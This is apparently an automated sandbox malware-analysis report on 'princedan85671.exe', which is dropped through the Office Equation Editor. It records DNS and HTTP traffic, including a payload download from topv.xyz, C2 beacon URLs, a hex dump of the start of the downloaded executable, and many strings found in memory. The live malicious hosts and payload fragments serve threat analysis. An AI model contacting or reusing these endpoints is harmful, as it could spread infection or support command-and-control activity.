Source:	Binary string: netsh.pdb source: princedan85671.exe, 00000006.00000002.2223629114.0000000000614000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: princedan85671.exe, netsh.exe

Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 4x nop then pop esi
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 4x nop then pop ebx
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi

Source: global traffic

DNS query: name: topv.xyz

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.containerflippers.com/np0c/

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	DNS query: topv.xyz
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	DNS query: topv.xyz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 22 Jul 2021 12:21:11 GMTContent-Type: application/x-msdownloadContent-Length: 648912Last-Modified: Wed, 21 Jul 2021 23:31:35 GMTConnection: keep-aliveETag: "60f8ae57-9e6d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 9e f8 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 08 00 00 2c 01 00 00 00 00 00 96 bb 08 00 00 20 00 00 00 c0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c bb 08 00 57 00 00 00 00 c0 08 00 18 28 01 00 00 00 00 00 00 00 00 00 00 ca 09 00 d0 1c 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 9b 08 00 00 20 00 00 00 9c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 28 01 00 00 c0 08 00 00 2a 01 00 00 9e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bb 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 9f 08 00 a0 1b 00 00 03 00 00 00 20 00 00 06 98 31 00 00 04 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 18 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1a 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 25 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 03 16 2c 0b 26 26 02 04 15 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b f0 7d 03 00 00 04 2b 00 2a 00 00 00 03 30 04 00 5c 00 00 00 00 00 00 00 02 28 15 00 00 0a 20 f0 55 00 00 1c 2d 1b 26 02 73 16 00 00 0a 1d 2d 18 26 26 28 17 00 00 0a 7e 06 00 00 04 25 2d 2f 2b 0e 28 18 00 00 0a 2b df 7d 04 00 00 04 2b e3 26 7e 05 00 00 04 fe 06 0d 00 00 06 73 19 00 00 0a 25 1c 2d 03 26 2b 07 80 06 00 00 04 2b 00 6f 1a 00 00 0a 2a 13 30 03 00 29 00 00 00 01 00 00 11 03 04 73 04 00 00 06 16 2c 0c 26 02 03 28 0a 00 00 06 2d 13 2b 03 0a 2b f2 02 7b 04 00 00 04 06 6f 1b 00 00 0a 17 2a 16 2a 00 00 00 13 30 03 00 24 00 00 00 01 00 00 11 02 03 28 0a 00 00 06 17 2d 06 26 06 2c 14

Source: global traffic

HTTP traffic detected: GET /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&CFQLn=EPt44Fr8fZGdt HTTP/1.1Host: www.anandsharmah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 185.239.243.112 185.239.243.112

Source: Joe Sandbox View	ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View	ASN Name: NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN

Source: global traffic

HTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{23BE6748-299E-4B99-A605-44EE5B79BCDD}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /princedanx.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: topv.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&CFQLn=EPt44Fr8fZGdt HTTP/1.1Host: www.anandsharmah.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: topv.xyz

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlContent-Length: 583Date: Thu, 22 Jul 2021 12:22:48 GMTServer: LiteSpeedVary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 30 63 2f 3f 54 52 2d 6c 3d 4d 62 47 50 2f 69 6b 67 57 46 77 31 59 58 38 73 6f 76 30 46 58 63 4c 6b 4a 39 39 48 2b 32 32 68 30 31 58 56 6a 4e 55 47 64 69 47 48 74 7a 76 66 7a 63 66 75 7a 49 52 50 77 4a 41 39 43 47 45 4e 61 2f 74 58 74 67 3d 3d 26 61 6d 70 3b 43 46 51 4c 6e 3d 45 50 74 34 34 46 72 38 66 5a 47 64 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 61 6e 61 6e 64 73 68 61 72 6d 61 68 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np0c/?TR-l=MbGP/ikgWFw1YX8sov0FXcLkJ99H+22h01XVjNUGdiGHtzvfzcfuzIRPwJA9CGENa/tXtg==&CFQLn=EPt44Fr8fZGdt was not found on this server.<HR><I>www.anandsharmah.com</I></BODY></HTML>

Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2208825843.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000007.00000000.2195641633.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.2194017018.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: princedan85671.exe, 00000004.00000002.2181351486.000000000072B000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000007.00000000.2184596718.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000007.00000000.2209051870.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
